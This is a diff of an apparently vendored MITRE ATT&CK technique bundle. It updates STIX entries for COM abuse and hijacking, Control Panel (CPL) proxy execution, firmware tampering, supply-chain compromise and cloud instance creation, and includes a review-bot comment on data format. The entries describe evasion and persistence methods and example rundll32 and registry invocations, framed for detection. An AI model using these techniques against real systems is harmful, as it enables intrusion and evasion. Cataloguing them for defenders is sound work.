+ "SYSTEM"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host intrusion prevention systems",
+ "File monitoring"
+ ],
+ "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.",
"x_mitre_data_sources": [
"Component firmware",
"Process monitoring",
"Disk forensics",
"API monitoring"
],
- "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Host intrusion prevention systems",
- "File monitoring"
- ],
- "x_mitre_permissions_required": [
- "SYSTEM"
- ],
- "x_mitre_system_requirements": [
- "Ability to update component device firmware from the host operating system."
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
- "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [VBScript](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)",
+ "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)",
"name": "Component Object Model",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -4469,18 +4577,21 @@
],
"modified": "2020-03-28T19:30:52.639Z",
"created": "2020-02-12T14:09:53.107Z",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ",
"x_mitre_data_sources": [
"Process monitoring",
"DLL monitoring"
- ],
- "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "Windows"
]
},
{
+ "created": "2017-05-31T21:31:33.979Z",
+ "modified": "2020-03-20T16:01:20.868Z",
+ "type": "attack-pattern",
"revoked": true,
"id": "attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69",
"name": "Component Object Model Hijacking",
@@ -4505,10 +4616,7 @@
"description": "Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.",
"url": "https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com"
}
- ],
- "type": "attack-pattern",
- "modified": "2020-03-20T16:01:20.868Z",
- "created": "2017-05-31T21:31:33.979Z"
+ ]
},
{
"external_references": [
@@ -4551,14 +4659,14 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-16T14:19:22.457Z",
+ "modified": "2020-07-09T13:55:51.172Z",
"created": "2020-03-16T14:12:47.923Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "ENDGAME"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Endgame COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. \n\nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
@@ -4566,12 +4674,12 @@
"DLL monitoring",
"Windows Registry"
],
- "x_mitre_detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Endgame COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. \n\nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Elastic"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"revoked": false,
@@ -4657,17 +4765,8 @@
],
"modified": "2020-03-30T13:36:10.069Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_remote_support": true,
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "User"
- ],
- "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "2.0",
"x_mitre_data_sources": [
"PowerShell logs",
"API monitoring",
@@ -4678,8 +4777,17 @@
"Windows Registry",
"Windows event logs"
],
- "x_mitre_version": "2.0",
- "x_mitre_deprecated": true
+ "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_remote_support": true,
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5",
@@ -4705,21 +4813,21 @@
],
"modified": "2020-03-27T14:49:58.249Z",
"created": "2020-02-11T18:18:34.279Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "CrowdStrike Falcon OverWatch"
+ ],
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Binary file metadata"
+ ],
+ "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.",
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Binary file metadata"
- ],
- "x_mitre_contributors": [
- "CrowdStrike Falcon OverWatch"
- ]
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -4745,20 +4853,20 @@
],
"modified": "2020-03-23T12:51:45.475Z",
"created": "2020-03-11T14:28:40.064Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.",
"x_mitre_data_sources": [
"Component firmware",
"BIOS",
"Disk forensics",
"EFI"
],
- "x_mitre_detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -4789,20 +4897,36 @@
],
"modified": "2020-03-11T14:13:42.916Z",
"created": "2020-03-11T14:13:42.916Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ",
"x_mitre_data_sources": [
"File monitoring",
"Web proxy"
],
- "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
+ "created": "2020-03-11T14:17:21.153Z",
+ "modified": "2020-03-11T14:17:21.153Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "initial-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
+ "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) ",
+ "name": "Compromise Software Supply Chain",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -4820,22 +4944,6 @@
"source_name": "Command Five SK 2011"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Compromise Software Supply Chain",
- "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) ",
- "id": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "initial-access"
- }
- ],
- "modified": "2020-03-11T14:17:21.153Z",
- "created": "2020-03-11T14:17:21.153Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -4878,23 +4986,23 @@
],
"modified": "2020-03-24T16:42:09.222Z",
"created": "2020-02-14T13:09:51.004Z",
- "x_mitre_platforms": [
- "SaaS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
"x_mitre_data_sources": [
"Third-party application logs",
"Authentication logs"
],
- "x_mitre_detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "SaaS"
+ ]
},
{
"id": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f",
- "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)\n\nFor ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.",
+ "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)\n\nFor ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.",
"name": "Control Panel",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -4934,20 +5042,11 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T16:11:43.517Z",
+ "modified": "2020-06-20T22:33:18.929Z",
"created": "2020-01-23T19:59:52.630Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_defense_bypassed": [
- "Process whitelisting",
- "Application whitelisting"
- ],
- "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}). 
(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters",
@@ -4956,9 +5055,17 @@
"Binary file metadata",
"API monitoring"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}). 
(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)",
+ "x_mitre_defense_bypassed": [
+ "Application control"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
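Review bot: The added `x_mitre_defense_bypassed` value for Control Panel replaces the former `"Process whitelisting"`/`"Application whitelisting"` entries with the single string `"Application control"`, so any code in this repository that filters or maps techniques by the old literals will silently stop matching T1218.002; grep the consumers of this bundle for those strings before merging (they are not visible from here). Separately, the added `x_mitre_detection` string appears to break mid-string right after `{Canonical_Name}). ` and resume on the next physical line with `(Citation: Microsoft Implementing CPL)` — if that is a literal newline in the file rather than a rendering wrap, it is an unescaped control character inside a JSON string and a strict RFC 8259 parser will reject the entire bundle, so it should be `\n` or a plain space as elsewhere in the same field. The same break exists on the removed side, so this is pre-existing upstream data rather than something this commit introduces, but it is worth validating the file with a strict parser (`jq . enterprise-attack.json`) as part of the vendoring step.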
@@ -5024,9 +5131,22 @@
],
"modified": "2020-03-24T12:44:28.199Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Microsoft Threat Intelligence Center (MSTIC)",
+ "Praetorian"
],
+ "x_mitre_version": "2.1",
+ "x_mitre_data_sources": [
+ "Office 365 account logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs",
+ "Process monitoring",
+ "Process command-line parameters",
+ "Authentication logs",
+ "Windows event logs"
+ ],
+ "x_mitre_detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\n\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -5037,22 +5157,71 @@
"Azure",
"Office 365"
],
- "x_mitre_detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\n\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ]
+ },
+ {
+ "id": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c",
+ "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.",
+ "name": "Create Cloud Instance",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1578.002",
+ "url": "https://attack.mitre.org/techniques/T1578/002"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ },
+ {
+ "source_name": "AWS CloudTrail Search",
+ "url": "https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/",
+ "description": "Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Azure Activity Logs",
+ "url": "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs",
+ "description": "Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Cloud Audit Logs",
+ "url": "https://cloud.google.com/logging/docs/audit#admin-activity",
+ "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020."
+ }
+ ],
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-18T11:45:36.417Z",
+ "created": "2020-05-14T14:45:15.978Z",
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
+ ],
"x_mitre_data_sources": [
- "Office 365 account logs",
+ "GCP audit logs",
+ "Stackdriver logs",
"Azure activity logs",
- "AWS CloudTrail logs",
- "Process monitoring",
- "Process command-line parameters",
- "Authentication logs",
- "Windows event logs"
+ "AWS CloudTrail logs"
],
- "x_mitre_version": "2.1",
- "x_mitre_contributors": [
- "Microsoft Threat Intelligence Center (MSTIC)",
- "Praetorian"
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)"
},
{
"external_references": [
@@ -5087,25 +5256,115 @@
],
"modified": "2020-03-26T21:28:19.476Z",
